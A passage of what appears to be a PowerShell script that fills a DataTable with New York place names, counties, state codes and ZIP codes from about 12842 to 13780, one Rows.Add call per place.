$Cities.Rows.Add("Indian lake","Hamilton","New york","NY","36","12842") + $null = $Cities.Rows.Add("Johnsburg","Warren","New york","NY","36","12843") + $null = $Cities.Rows.Add("Pilot knob","Washington","New york","NY","36","12844") + $null = $Cities.Rows.Add("Lake george","Warren","New york","NY","36","12845") + $null = $Cities.Rows.Add("Lake luzerne","Warren","New york","NY","36","12846") + $null = $Cities.Rows.Add("Long lake","Hamilton","New york","NY","36","12847") + $null = $Cities.Rows.Add("Middle granville","Washington","New york","NY","36","12849") + $null = $Cities.Rows.Add("Middle grove","Saratoga","New york","NY","36","12850") + $null = $Cities.Rows.Add("Minerva","Essex","New york","NY","36","12851") + $null = $Cities.Rows.Add("Newcomb","Essex","New york","NY","36","12852") + $null = $Cities.Rows.Add("North creek","Warren","New york","NY","36","12853") + $null = $Cities.Rows.Add("North hudson","Essex","New york","NY","36","12855") + $null = $Cities.Rows.Add("North river","Warren","New york","NY","36","12856") + $null = $Cities.Rows.Add("Olmstedville","Essex","New york","NY","36","12857") + $null = $Cities.Rows.Add("Paradox","Essex","New york","NY","36","12858") + $null = $Cities.Rows.Add("Porter corners","Saratoga","New york","NY","36","12859") + $null = $Cities.Rows.Add("Pottersville","Warren","New york","NY","36","12860") + $null = $Cities.Rows.Add("Putnam station","Washington","New york","NY","36","12861") + $null = $Cities.Rows.Add("Rock city falls","Saratoga","New york","NY","36","12863") + $null = $Cities.Rows.Add("Salem","Washington","New york","NY","36","12865") + $null = $Cities.Rows.Add("Wilton","Saratoga","New york","NY","36","12866") + $null = $Cities.Rows.Add("Schroon lake","Essex","New york","NY","36","12870") + $null = $Cities.Rows.Add("Schuylerville","Saratoga","New york","NY","36","12871") + $null = $Cities.Rows.Add("Shushan","Washington","New york","NY","36","12873") + $null = $Cities.Rows.Add("Silver bay","Warren","New york","NY","36","12874") + $null = $Cities.Rows.Add("Stony creek","Warren","New york","NY","36","12878") + $null = $Cities.Rows.Add("Ticonderoga","Essex","New york","NY","36","12883") + $null = $Cities.Rows.Add("Warrensburg","Warren","New york","NY","36","12885") + $null = $Cities.Rows.Add("Wevertown","Warren","New york","NY","36","12886") + $null = $Cities.Rows.Add("Whitehall","Washington","New york","NY","36","12887") + $null = $Cities.Rows.Add("Zcta 128hh","Essex","New york","NY","36","128HH") + $null = $Cities.Rows.Add("Zcta 128xx","Hamilton","New york","NY","36","128XX") + $null = $Cities.Rows.Add("Plattsburgh","Clinton","New york","NY","36","12901") + $null = $Cities.Rows.Add("Plattsburgh a f","Clinton","New york","NY","36","12903") + $null = $Cities.Rows.Add("Altona","Clinton","New york","NY","36","12910") + $null = $Cities.Rows.Add("Au sable chasm","Clinton","New york","NY","36","12911") + $null = $Cities.Rows.Add("Au sable forks","Clinton","New york","NY","36","12912") + $null = $Cities.Rows.Add("Bloomingdale","Essex","New york","NY","36","12913") + $null = $Cities.Rows.Add("Bombay","Franklin","New york","NY","36","12914") + $null = $Cities.Rows.Add("Brushton","Franklin","New york","NY","36","12916") + $null = $Cities.Rows.Add("Burke","Franklin","New york","NY","36","12917") + $null = $Cities.Rows.Add("Cadyville","Clinton","New york","NY","36","12918") + $null = $Cities.Rows.Add("Champlain","Clinton","New york","NY","36","12919") + $null = $Cities.Rows.Add("Chateaugay","Franklin","New york","NY","36","12920") + $null = $Cities.Rows.Add("Chazy","Clinton","New york","NY","36","12921") + $null = $Cities.Rows.Add("Childwold","St. Lawrence","New york","NY","36","12922") + $null = $Cities.Rows.Add("Churubusco","Clinton","New york","NY","36","12923") + $null = $Cities.Rows.Add("Constable","Franklin","New york","NY","36","12926") + $null = $Cities.Rows.Add("Cranberry lake","St. Lawrence","New york","NY","36","12927") + $null = $Cities.Rows.Add("Crown point","Essex","New york","NY","36","12928") + $null = $Cities.Rows.Add("Dickinson center","Franklin","New york","NY","36","12930") + $null = $Cities.Rows.Add("Elizabethtown","Essex","New york","NY","36","12932") + $null = $Cities.Rows.Add("Ellenburg center","Clinton","New york","NY","36","12934") + $null = $Cities.Rows.Add("Ellenburg depot","Clinton","New york","NY","36","12935") + $null = $Cities.Rows.Add("Essex","Essex","New york","NY","36","12936") + $null = $Cities.Rows.Add("Fort covington","Franklin","New york","NY","36","12937") + $null = $Cities.Rows.Add("Jay","Essex","New york","NY","36","12941") + $null = $Cities.Rows.Add("Keene","Essex","New york","NY","36","12942") + $null = $Cities.Rows.Add("Saint huberts","Essex","New york","NY","36","12943") + $null = $Cities.Rows.Add("Keeseville","Essex","New york","NY","36","12944") + $null = $Cities.Rows.Add("Upper saint regi","Franklin","New york","NY","36","12945") + $null = $Cities.Rows.Add("North pole","Essex","New york","NY","36","12946") + $null = $Cities.Rows.Add("Lewis","Essex","New york","NY","36","12950") + $null = $Cities.Rows.Add("Lyon mountain","Clinton","New york","NY","36","12952") + $null = $Cities.Rows.Add("Malone","Franklin","New york","NY","36","12953") + $null = $Cities.Rows.Add("Merrill","Clinton","New york","NY","36","12955") + $null = $Cities.Rows.Add("Mineville","Essex","New york","NY","36","12956") + $null = $Cities.Rows.Add("Moira","Franklin","New york","NY","36","12957") + $null = $Cities.Rows.Add("Mooers","Clinton","New york","NY","36","12958") + $null = $Cities.Rows.Add("Mooers forks","Clinton","New york","NY","36","12959") + $null = $Cities.Rows.Add("Moriah","Essex","New york","NY","36","12960") + $null = $Cities.Rows.Add("Moriah center","Essex","New york","NY","36","12961") + $null = $Cities.Rows.Add("Morrisonville","Clinton","New york","NY","36","12962") + $null = $Cities.Rows.Add("New russia","Essex","New york","NY","36","12964") + $null = $Cities.Rows.Add("Nicholville","St. Lawrence","New york","NY","36","12965") + $null = $Cities.Rows.Add("Bangor","Franklin","New york","NY","36","12966") + $null = $Cities.Rows.Add("North lawrence","St. Lawrence","New york","NY","36","12967") + $null = $Cities.Rows.Add("Owls head","Franklin","New york","NY","36","12969") + $null = $Cities.Rows.Add("Paul smiths","Franklin","New york","NY","36","12970") + $null = $Cities.Rows.Add("Peru","Clinton","New york","NY","36","12972") + $null = $Cities.Rows.Add("Port henry","Essex","New york","NY","36","12974") + $null = $Cities.Rows.Add("Rouses point","Clinton","New york","NY","36","12979") + $null = $Cities.Rows.Add("Saint regis fall","Franklin","New york","NY","36","12980") + $null = $Cities.Rows.Add("Saranac","Clinton","New york","NY","36","12981") + $null = $Cities.Rows.Add("Saranac lake","Franklin","New york","NY","36","12983") + $null = $Cities.Rows.Add("Schuyler falls","Clinton","New york","NY","36","12985") + $null = $Cities.Rows.Add("Sunmount","Franklin","New york","NY","36","12986") + $null = $Cities.Rows.Add("Upper jay","Essex","New york","NY","36","12987") + $null = $Cities.Rows.Add("Vermontville","Franklin","New york","NY","36","12989") + $null = $Cities.Rows.Add("West chazy","Clinton","New york","NY","36","12992") + $null = $Cities.Rows.Add("Westport","Essex","New york","NY","36","12993") + $null = $Cities.Rows.Add("Willsboro","Essex","New york","NY","36","12996") + $null = $Cities.Rows.Add("Zcta 129hh","Clinton","New york","NY","36","129HH") + $null = $Cities.Rows.Add("Zcta 129xx","Franklin","New york","NY","36","129XX") + $null = $Cities.Rows.Add("Auburn","Cayuga","New york","NY","36","13021") + $null = $Cities.Rows.Add("Aurora","Cayuga","New york","NY","36","13026") + $null = $Cities.Rows.Add("Baldwinsville","Onondaga","New york","NY","36","13027") + $null = $Cities.Rows.Add("Bernhards bay","Oswego","New york","NY","36","13028") + $null = $Cities.Rows.Add("Brewerton","Onondaga","New york","NY","36","13029") + $null = $Cities.Rows.Add("Bridgeport","Onondaga","New york","NY","36","13030") + $null = $Cities.Rows.Add("Camillus","Onondaga","New york","NY","36","13031") + $null = $Cities.Rows.Add("Canastota","Madison","New york","NY","36","13032") + $null = $Cities.Rows.Add("Cato","Cayuga","New york","NY","36","13033") + $null = $Cities.Rows.Add("Cayuga","Cayuga","New york","NY","36","13034") + $null = $Cities.Rows.Add("Cazenovia","Madison","New york","NY","36","13035") + $null = $Cities.Rows.Add("Central square","Oswego","New york","NY","36","13036") + $null = $Cities.Rows.Add("Chittenango","Madison","New york","NY","36","13037") + $null = $Cities.Rows.Add("Cicero","Onondaga","New york","NY","36","13039") + $null = $Cities.Rows.Add("Cincinnatus","Cortland","New york","NY","36","13040") + $null = $Cities.Rows.Add("Clay","Onondaga","New york","NY","36","13041") + $null = $Cities.Rows.Add("Cleveland","Oneida","New york","NY","36","13042") + $null = $Cities.Rows.Add("Constantia","Oswego","New york","NY","36","13044") + $null = $Cities.Rows.Add("Cortland","Cortland","New york","NY","36","13045") + $null = $Cities.Rows.Add("De ruyter","Madison","New york","NY","36","13052") + $null = $Cities.Rows.Add("Dryden","Tompkins","New york","NY","36","13053") + $null = $Cities.Rows.Add("Durhamville","Oneida","New york","NY","36","13054") + $null = $Cities.Rows.Add("East syracuse","Onondaga","New york","NY","36","13057") + $null = $Cities.Rows.Add("Elbridge","Onondaga","New york","NY","36","13060") + $null = $Cities.Rows.Add("Erieville","Madison","New york","NY","36","13061") + $null = $Cities.Rows.Add("Etna","Tompkins","New york","NY","36","13062") + $null = $Cities.Rows.Add("Fabius","Onondaga","New york","NY","36","13063") + $null = $Cities.Rows.Add("Fayetteville","Onondaga","New york","NY","36","13066") + $null = $Cities.Rows.Add("Freeville","Tompkins","New york","NY","36","13068") + $null = $Cities.Rows.Add("Fulton","Oswego","New york","NY","36","13069") + $null = $Cities.Rows.Add("Genoa","Cayuga","New york","NY","36","13071") + $null = $Cities.Rows.Add("Georgetown","Madison","New york","NY","36","13072") + $null = $Cities.Rows.Add("Groton","Tompkins","New york","NY","36","13073") + $null = $Cities.Rows.Add("Hannibal","Oswego","New york","NY","36","13074") + $null = $Cities.Rows.Add("Hastings","Oswego","New york","NY","36","13076") + $null = $Cities.Rows.Add("Homer","Cortland","New york","NY","36","13077") + $null = $Cities.Rows.Add("Jamesville","Onondaga","New york","NY","36","13078") + $null = $Cities.Rows.Add("Jordan","Onondaga","New york","NY","36","13080") + $null = $Cities.Rows.Add("King ferry","Cayuga","New york","NY","36","13081") + $null = $Cities.Rows.Add("Kirkville","Madison","New york","NY","36","13082") + $null = $Cities.Rows.Add("Lacona","Oswego","New york","NY","36","13083") + $null = $Cities.Rows.Add("La fayette","Onondaga","New york","NY","36","13084") + $null = $Cities.Rows.Add("Liverpool","Onondaga","New york","NY","36","13088") + $null = $Cities.Rows.Add("Bayberry","Onondaga","New york","NY","36","13090") + $null = $Cities.Rows.Add("Locke","Cayuga","New york","NY","36","13092") + $null = $Cities.Rows.Add("Zcta 130hh","Cayuga","New york","NY","36","130HH") + $null = $Cities.Rows.Add("Mc graw","Cortland","New york","NY","36","13101") + $null = $Cities.Rows.Add("Manlius","Onondaga","New york","NY","36","13104") + $null = $Cities.Rows.Add("Marcellus","Onondaga","New york","NY","36","13108") + $null = $Cities.Rows.Add("Marietta","Onondaga","New york","NY","36","13110") + $null = $Cities.Rows.Add("Martville","Cayuga","New york","NY","36","13111") + $null = $Cities.Rows.Add("Memphis","Onondaga","New york","NY","36","13112") + $null = $Cities.Rows.Add("Mexico","Oswego","New york","NY","36","13114") + $null = $Cities.Rows.Add("Minoa","Onondaga","New york","NY","36","13116") + $null = $Cities.Rows.Add("Moravia","Cayuga","New york","NY","36","13118") + $null = $Cities.Rows.Add("Nedrow","Onondaga","New york","NY","36","13120") + $null = $Cities.Rows.Add("New woodstock","Madison","New york","NY","36","13122") + $null = $Cities.Rows.Add("North pitcher","Chenango","New york","NY","36","13124") + $null = $Cities.Rows.Add("Oswego","Oswego","New york","NY","36","13126") + $null = $Cities.Rows.Add("Parish","Oswego","New york","NY","36","13131") + $null = $Cities.Rows.Add("Pennellville","Oswego","New york","NY","36","13132") + $null = $Cities.Rows.Add("Phoenix","Oswego","New york","NY","36","13135") + $null = $Cities.Rows.Add("Pitcher","Chenango","New york","NY","36","13136") + $null = $Cities.Rows.Add("Port byron","Cayuga","New york","NY","36","13140") + $null = $Cities.Rows.Add("Preble","Cortland","New york","NY","36","13141") + $null = $Cities.Rows.Add("Pulaski","Oswego","New york","NY","36","13142") + $null = $Cities.Rows.Add("Red creek","Wayne","New york","NY","36","13143") + $null = $Cities.Rows.Add("Richland","Oswego","New york","NY","36","13144") + $null = $Cities.Rows.Add("Sandy creek","Oswego","New york","NY","36","13145") + $null = $Cities.Rows.Add("Savannah","Wayne","New york","NY","36","13146") + $null = $Cities.Rows.Add("Venice center","Cayuga","New york","NY","36","13147") + $null = $Cities.Rows.Add("Seneca falls","Seneca","New york","NY","36","13148") + $null = $Cities.Rows.Add("Skaneateles","Onondaga","New york","NY","36","13152") + $null = $Cities.Rows.Add("South otselic","Chenango","New york","NY","36","13155") + $null = $Cities.Rows.Add("Sterling","Cayuga","New york","NY","36","13156") + $null = $Cities.Rows.Add("Truxton","Cortland","New york","NY","36","13158") + $null = $Cities.Rows.Add("Tully","Onondaga","New york","NY","36","13159") + $null = $Cities.Rows.Add("Union springs","Cayuga","New york","NY","36","13160") + $null = $Cities.Rows.Add("Warners","Onondaga","New york","NY","36","13164") + $null = $Cities.Rows.Add("Waterloo","Seneca","New york","NY","36","13165") + $null = $Cities.Rows.Add("Weedsport","Cayuga","New york","NY","36","13166") + $null = $Cities.Rows.Add("West monroe","Oswego","New york","NY","36","13167") + $null = $Cities.Rows.Add("Zcta 131hh","Cayuga","New york","NY","36","131HH") + $null = $Cities.Rows.Add("Syracuse","Onondaga","New york","NY","36","13202") + $null = $Cities.Rows.Add("Syracuse","Onondaga","New york","NY","36","13203") + $null = $Cities.Rows.Add("Syracuse","Onondaga","New york","NY","36","13204") + $null = $Cities.Rows.Add("Syracuse","Onondaga","New york","NY","36","13205") + $null = $Cities.Rows.Add("Syracuse","Onondaga","New york","NY","36","13206") + $null = $Cities.Rows.Add("Syracuse","Onondaga","New york","NY","36","13207") + $null = $Cities.Rows.Add("Syracuse","Onondaga","New york","NY","36","13208") + $null = $Cities.Rows.Add("Solvay","Onondaga","New york","NY","36","13209") + $null = $Cities.Rows.Add("Syracuse","Onondaga","New york","NY","36","13210") + $null = $Cities.Rows.Add("Mattydale","Onondaga","New york","NY","36","13211") + $null = $Cities.Rows.Add("North syracuse","Onondaga","New york","NY","36","13212") + $null = $Cities.Rows.Add("De witt","Onondaga","New york","NY","36","13214") + $null = $Cities.Rows.Add("Onondaga","Onondaga","New york","NY","36","13215") + $null = $Cities.Rows.Add("Syracuse","Onondaga","New york","NY","36","13219") + $null = $Cities.Rows.Add("Syracuse","Onondaga","New york","NY","36","13224") + $null = $Cities.Rows.Add("Syracuse","Onondaga","New york","NY","36","13290") + $null = $Cities.Rows.Add("Zcta 132hh","Onondaga","New york","NY","36","132HH") + $null = $Cities.Rows.Add("Alder creek","Oneida","New york","NY","36","13301") + $null = $Cities.Rows.Add("Altmar","Oswego","New york","NY","36","13302") + $null = $Cities.Rows.Add("Ava","Oneida","New york","NY","36","13303") + $null = $Cities.Rows.Add("Barneveld","Oneida","New york","NY","36","13304") + $null = $Cities.Rows.Add("Blossvale","Oneida","New york","NY","36","13308") + $null = $Cities.Rows.Add("Boonville","Oneida","New york","NY","36","13309") + $null = $Cities.Rows.Add("Bouckville","Madison","New york","NY","36","13310") + $null = $Cities.Rows.Add("Glenfield","Lewis","New york","NY","36","13312") + $null = $Cities.Rows.Add("Bridgewater","Oneida","New york","NY","36","13313") + $null = $Cities.Rows.Add("Brookfield","Madison","New york","NY","36","13314") + $null = $Cities.Rows.Add("Burlington flats","Otsego","New york","NY","36","13315") + $null = $Cities.Rows.Add("Camden","Oneida","New york","NY","36","13316") + $null = $Cities.Rows.Add("Ames","Montgomery","New york","NY","36","13317") + $null = $Cities.Rows.Add("Cassville","Oneida","New york","NY","36","13318") + $null = $Cities.Rows.Add("Chadwicks","Oneida","New york","NY","36","13319") + $null = $Cities.Rows.Add("Cherry valley","Otsego","New york","NY","36","13320") + $null = $Cities.Rows.Add("Clayville","Oneida","New york","NY","36","13322") + $null = $Cities.Rows.Add("Clinton","Oneida","New york","NY","36","13323") + $null = $Cities.Rows.Add("Cold brook","Herkimer","New york","NY","36","13324") + $null = $Cities.Rows.Add("Constableville","Lewis","New york","NY","36","13325") + $null = $Cities.Rows.Add("Cooperstown","Otsego","New york","NY","36","13326") + $null = $Cities.Rows.Add("Croghan","Lewis","New york","NY","36","13327") + $null = $Cities.Rows.Add("Deansboro","Oneida","New york","NY","36","13328") + $null = $Cities.Rows.Add("Dolgeville","Herkimer","New york","NY","36","13329") + $null = $Cities.Rows.Add("Eagle bay","Herkimer","New york","NY","36","13331") + $null = $Cities.Rows.Add("Earlville","Madison","New york","NY","36","13332") + $null = $Cities.Rows.Add("East springfield","Otsego","New york","NY","36","13333") + $null = $Cities.Rows.Add("Eaton","Madison","New york","NY","36","13334") + $null = $Cities.Rows.Add("Edmeston","Otsego","New york","NY","36","13335") + $null = $Cities.Rows.Add("Fly creek","Otsego","New york","NY","36","13337") + $null = $Cities.Rows.Add("Forestport","Oneida","New york","NY","36","13338") + $null = $Cities.Rows.Add("Fort plain","Montgomery","New york","NY","36","13339") + $null = $Cities.Rows.Add("Frankfort","Herkimer","New york","NY","36","13340") + $null = $Cities.Rows.Add("Franklin springs","Oneida","New york","NY","36","13341") + $null = $Cities.Rows.Add("Garrattsville","Otsego","New york","NY","36","13342") + $null = $Cities.Rows.Add("Glenfield","Lewis","New york","NY","36","13343") + $null = $Cities.Rows.Add("Hamilton","Madison","New york","NY","36","13346") + $null = $Cities.Rows.Add("Hartwick","Otsego","New york","NY","36","13348") + $null = $Cities.Rows.Add("Herkimer","Herkimer","New york","NY","36","13350") + $null = $Cities.Rows.Add("Hoffmeister","Hamilton","New york","NY","36","13353") + $null = $Cities.Rows.Add("Holland patent","Oneida","New york","NY","36","13354") + $null = $Cities.Rows.Add("Hubbardsville","Madison","New york","NY","36","13355") + $null = $Cities.Rows.Add("Ilion","Herkimer","New york","NY","36","13357") + $null = $Cities.Rows.Add("Inlet","Hamilton","New york","NY","36","13360") + $null = $Cities.Rows.Add("Jordanville","Herkimer","New york","NY","36","13361") + $null = $Cities.Rows.Add("Lee center","Oneida","New york","NY","36","13363") + $null = $Cities.Rows.Add("Little falls","Herkimer","New york","NY","36","13365") + $null = $Cities.Rows.Add("Beaver river","Lewis","New york","NY","36","13367") + $null = $Cities.Rows.Add("Lyons falls","Lewis","New york","NY","36","13368") + $null = $Cities.Rows.Add("Zcta 133hh","Hamilton","New york","NY","36","133HH") + $null = $Cities.Rows.Add("Zcta 133xx","Hamilton","New york","NY","36","133XX") + $null = $Cities.Rows.Add("Madison","Madison","New york","NY","36","13402") + $null = $Cities.Rows.Add("Marcy","Oneida","New york","NY","36","13403") + $null = $Cities.Rows.Add("Middleville","Herkimer","New york","NY","36","13406") + $null = $Cities.Rows.Add("Mohawk","Herkimer","New york","NY","36","13407") + $null = $Cities.Rows.Add("Morrisville","Madison","New york","NY","36","13408") + $null = $Cities.Rows.Add("Munnsville","Madison","New york","NY","36","13409") + $null = $Cities.Rows.Add("New berlin","Chenango","New york","NY","36","13411") + $null = $Cities.Rows.Add("New hartford","Oneida","New york","NY","36","13413") + $null = $Cities.Rows.Add("Newport","Herkimer","New york","NY","36","13416") + $null = $Cities.Rows.Add("New york mills","Oneida","New york","NY","36","13417") + $null = $Cities.Rows.Add("North brookfield","Madison","New york","NY","36","13418") + $null = $Cities.Rows.Add("Old forge","Herkimer","New york","NY","36","13420") + $null = $Cities.Rows.Add("Oneida","Madison","New york","NY","36","13421") + $null = $Cities.Rows.Add("Oriskany","Oneida","New york","NY","36","13424") + $null = $Cities.Rows.Add("Oriskany falls","Oneida","New york","NY","36","13425") + $null = $Cities.Rows.Add("Palatine bridge","Montgomery","New york","NY","36","13428") + $null = $Cities.Rows.Add("Poland","Herkimer","New york","NY","36","13431") + $null = $Cities.Rows.Add("Port leyden","Lewis","New york","NY","36","13433") + $null = $Cities.Rows.Add("Raquette lake","Hamilton","New york","NY","36","13436") + $null = $Cities.Rows.Add("Redfield","Oswego","New york","NY","36","13437") + $null = $Cities.Rows.Add("Remsen","Oneida","New york","NY","36","13438") + $null = $Cities.Rows.Add("Richfield spring","Otsego","New york","NY","36","13439") + $null = $Cities.Rows.Add("Rome","Oneida","New york","NY","36","13440") + $null = $Cities.Rows.Add("Roseboom","Otsego","New york","NY","36","13450") + $null = $Cities.Rows.Add("Saint johnsville","Montgomery","New york","NY","36","13452") + $null = $Cities.Rows.Add("Salisbury center","Herkimer","New york","NY","36","13454") + $null = $Cities.Rows.Add("Sauquoit","Oneida","New york","NY","36","13456") + $null = $Cities.Rows.Add("Sharon springs","Schoharie","New york","NY","36","13459") + $null = $Cities.Rows.Add("Sherburne","Chenango","New york","NY","36","13460") + $null = $Cities.Rows.Add("Sherrill","Oneida","New york","NY","36","13461") + $null = $Cities.Rows.Add("Smyrna","Chenango","New york","NY","36","13464") + $null = $Cities.Rows.Add("Springfield cent","Otsego","New york","NY","36","13468") + $null = $Cities.Rows.Add("Stittville","Oneida","New york","NY","36","13469") + $null = $Cities.Rows.Add("Stratford","Fulton","New york","NY","36","13470") + $null = $Cities.Rows.Add("Taberg","Oneida","New york","NY","36","13471") + $null = $Cities.Rows.Add("Turin","Lewis","New york","NY","36","13473") + $null = $Cities.Rows.Add("Van hornesville","Otsego","New york","NY","36","13475") + $null = $Cities.Rows.Add("Vernon","Oneida","New york","NY","36","13476") + $null = $Cities.Rows.Add("Vernon center","Oneida","New york","NY","36","13477") + $null = $Cities.Rows.Add("Verona","Oneida","New york","NY","36","13478") + $null = $Cities.Rows.Add("Waterville","Oneida","New york","NY","36","13480") + $null = $Cities.Rows.Add("Westdale","Oneida","New york","NY","36","13483") + $null = $Cities.Rows.Add("West edmeston","Madison","New york","NY","36","13485") + $null = $Cities.Rows.Add("Westernville","Oneida","New york","NY","36","13486") + $null = $Cities.Rows.Add("West leyden","Lewis","New york","NY","36","13489") + $null = $Cities.Rows.Add("Westmoreland","Oneida","New york","NY","36","13490") + $null = $Cities.Rows.Add("West winfield","Herkimer","New york","NY","36","13491") + $null = $Cities.Rows.Add("Whitesboro","Oneida","New york","NY","36","13492") + $null = $Cities.Rows.Add("Williamstown","Oswego","New york","NY","36","13493") + $null = $Cities.Rows.Add("Yorkville","Oneida","New york","NY","36","13495") + $null = $Cities.Rows.Add("Zcta 134hh","Fulton","New york","NY","36","134HH") + $null = $Cities.Rows.Add("Zcta 134xx","Hamilton","New york","NY","36","134XX") + $null = $Cities.Rows.Add("Utica","Oneida","New york","NY","36","13501") + $null = $Cities.Rows.Add("Utica","Oneida","New york","NY","36","13502") + $null = $Cities.Rows.Add("Zcta 135hh","Oneida","New york","NY","36","135HH") + $null = $Cities.Rows.Add("Watertown","Jefferson","New york","NY","36","13601") + $null = $Cities.Rows.Add("Fort drum","Jefferson","New york","NY","36","13602") + $null = $Cities.Rows.Add("Fort drum","Jefferson","New york","NY","36","13603") + $null = $Cities.Rows.Add("Smithville","Jefferson","New york","NY","36","13605") + $null = $Cities.Rows.Add("Adams center","Jefferson","New york","NY","36","13606") + $null = $Cities.Rows.Add("Point vivian","Jefferson","New york","NY","36","13607") + $null = $Cities.Rows.Add("Antwerp","Jefferson","New york","NY","36","13608") + $null = $Cities.Rows.Add("Black river","Jefferson","New york","NY","36","13612") + $null = $Cities.Rows.Add("Brasher falls","St. Lawrence","New york","NY","36","13613") + $null = $Cities.Rows.Add("Brier hill","St. Lawrence","New york","NY","36","13614") + $null = $Cities.Rows.Add("Brownville","Jefferson","New york","NY","36","13615") + $null = $Cities.Rows.Add("Calcium","Jefferson","New york","NY","36","13616") + $null = $Cities.Rows.Add("Canton","St. Lawrence","New york","NY","36","13617") + $null = $Cities.Rows.Add("Cape vincent","Jefferson","New york","NY","36","13618") + $null = $Cities.Rows.Add("Carthage","Jefferson","New york","NY","36","13619") + $null = $Cities.Rows.Add("Castorland","Lewis","New york","NY","36","13620") + $null = $Cities.Rows.Add("Chase mills","St. Lawrence","New york","NY","36","13621") + $null = $Cities.Rows.Add("Chaumont","Jefferson","New york","NY","36","13622") + $null = $Cities.Rows.Add("Frontenac","Jefferson","New york","NY","36","13624") + $null = $Cities.Rows.Add("Colton","St. Lawrence","New york","NY","36","13625") + $null = $Cities.Rows.Add("Copenhagen","Lewis","New york","NY","36","13626") + $null = $Cities.Rows.Add("De kalb junction","St. Lawrence","New york","NY","36","13630") + $null = $Cities.Rows.Add("De peyster","St. Lawrence","New york","NY","36","13633") + $null = $Cities.Rows.Add("Dexter","Jefferson","New york","NY","36","13634") + $null = $Cities.Rows.Add("Edwards","St. Lawrence","New york","NY","36","13635") + $null = $Cities.Rows.Add("Evans mills","Jefferson","New york","NY","36","13637") + $null = $Cities.Rows.Add("Felts mills","Jefferson","New york","NY","36","13638") + $null = $Cities.Rows.Add("Fine","St. Lawrence","New york","NY","36","13639") + $null = $Cities.Rows.Add("Wellesley island","Jefferson","New york","NY","36","13640") + $null = $Cities.Rows.Add("Gouverneur","St. Lawrence","New york","NY","36","13642") + $null = $Cities.Rows.Add("Hammond","St. Lawrence","New york","NY","36","13646") + $null = $Cities.Rows.Add("Harrisville","Lewis","New york","NY","36","13648") + $null = $Cities.Rows.Add("Henderson","Jefferson","New york","NY","36","13650") + $null = $Cities.Rows.Add("Hermon","St. Lawrence","New york","NY","36","13652") + $null = $Cities.Rows.Add("Heuvelton","St. Lawrence","New york","NY","36","13654") + $null = $Cities.Rows.Add("Hogansburg","Franklin","New york","NY","36","13655") + $null = $Cities.Rows.Add("La fargeville","Jefferson","New york","NY","36","13656") + $null = $Cities.Rows.Add("Lisbon","St. Lawrence","New york","NY","36","13658") + $null = $Cities.Rows.Add("Lorraine","Jefferson","New york","NY","36","13659") + $null = $Cities.Rows.Add("Madrid","St. Lawrence","New york","NY","36","13660") + $null = $Cities.Rows.Add("Mannsville","Jefferson","New york","NY","36","13661") + $null = $Cities.Rows.Add("Massena","St. Lawrence","New york","NY","36","13662") + $null = $Cities.Rows.Add("Morristown","St. Lawrence","New york","NY","36","13664") + $null = $Cities.Rows.Add("Natural bridge","Jefferson","New york","NY","36","13665") + $null = $Cities.Rows.Add("Norfolk","St. Lawrence","New york","NY","36","13667") + $null = $Cities.Rows.Add("Norwood","St. Lawrence","New york","NY","36","13668") + $null = $Cities.Rows.Add("Ogdensburg","St. Lawrence","New york","NY","36","13669") + $null = $Cities.Rows.Add("Oswegatchie","St. Lawrence","New york","NY","36","13670") + $null = $Cities.Rows.Add("Parishville","St. Lawrence","New york","NY","36","13672") + $null = $Cities.Rows.Add("Philadelphia","Jefferson","New york","NY","36","13673") + $null = $Cities.Rows.Add("Plessis","Jefferson","New york","NY","36","13675") + $null = $Cities.Rows.Add("Potsdam","St. Lawrence","New york","NY","36","13676") + $null = $Cities.Rows.Add("Redwood","Jefferson","New york","NY","36","13679") + $null = $Cities.Rows.Add("Rensselaer falls","St. Lawrence","New york","NY","36","13680") + $null = $Cities.Rows.Add("Richville","St. Lawrence","New york","NY","36","13681") + $null = $Cities.Rows.Add("Rodman","Jefferson","New york","NY","36","13682") + $null = $Cities.Rows.Add("Degrasse","St. Lawrence","New york","NY","36","13684") + $null = $Cities.Rows.Add("Sackets harbor","Jefferson","New york","NY","36","13685") + $null = $Cities.Rows.Add("South colton","St. Lawrence","New york","NY","36","13687") + $null = $Cities.Rows.Add("Star lake","St. Lawrence","New york","NY","36","13690") + $null = $Cities.Rows.Add("Theresa","Jefferson","New york","NY","36","13691") + $null = $Cities.Rows.Add("Three mile bay","Jefferson","New york","NY","36","13693") + $null = $Cities.Rows.Add("Waddington","St. Lawrence","New york","NY","36","13694") + $null = $Cities.Rows.Add("Winthrop","St. Lawrence","New york","NY","36","13697") + $null = $Cities.Rows.Add("Zcta 136hh","Franklin","New york","NY","36","136HH") + $null = $Cities.Rows.Add("Zcta 136xx","Jefferson","New york","NY","36","136XX") + $null = $Cities.Rows.Add("Afton","Chenango","New york","NY","36","13730") + $null = $Cities.Rows.Add("Andes","Delaware","New york","NY","36","13731") + $null = $Cities.Rows.Add("Apalachin","Tioga","New york","NY","36","13732") + $null = $Cities.Rows.Add("Bainbridge","Chenango","New york","NY","36","13733") + $null = $Cities.Rows.Add("Barton","Tioga","New york","NY","36","13734") + $null = $Cities.Rows.Add("Berkshire","Tioga","New york","NY","36","13736") + $null = $Cities.Rows.Add("Bloomville","Delaware","New york","NY","36","13739") + $null = $Cities.Rows.Add("Bovina center","Delaware","New york","NY","36","13740") + $null = $Cities.Rows.Add("Candor","Tioga","New york","NY","36","13743") + $null = $Cities.Rows.Add("Castle creek","Broome","New york","NY","36","13744") + $null = $Cities.Rows.Add("Chenango forks","Broome","New york","NY","36","13746") + $null = $Cities.Rows.Add("Conklin","Broome","New york","NY","36","13748") + $null = $Cities.Rows.Add("Davenport","Delaware","New york","NY","36","13750") + $null = $Cities.Rows.Add("De lancey","Delaware","New york","NY","36","13752") + $null = $Cities.Rows.Add("Meredith","Delaware","New york","NY","36","13753") + $null = $Cities.Rows.Add("Deposit","Broome","New york","NY","36","13754") + $null = $Cities.Rows.Add("Downsville","Delaware","New york","NY","36","13755") + $null = $Cities.Rows.Add("East branch","Delaware","New york","NY","36","13756") + $null = $Cities.Rows.Add("East meredith","Delaware","New york","NY","36","13757") + $null = $Cities.Rows.Add("Endwell","Broome","New york","NY","36","13760") + $null = $Cities.Rows.Add("Fishs eddy","Delaware","New york","NY","36","13774") + $null = $Cities.Rows.Add("Franklin","Delaware","New york","NY","36","13775") + $null = $Cities.Rows.Add("Gilbertsville","Otsego","New york","NY","36","13776") + $null = $Cities.Rows.Add("Glen aubrey","Broome","New york","NY","36","13777") + $null = $Cities.Rows.Add("Greene","Chenango","New york","NY","36","13778") + $null = $Cities.Rows.Add("Guilford","Chenango","New york","NY","36","13780") + $null = 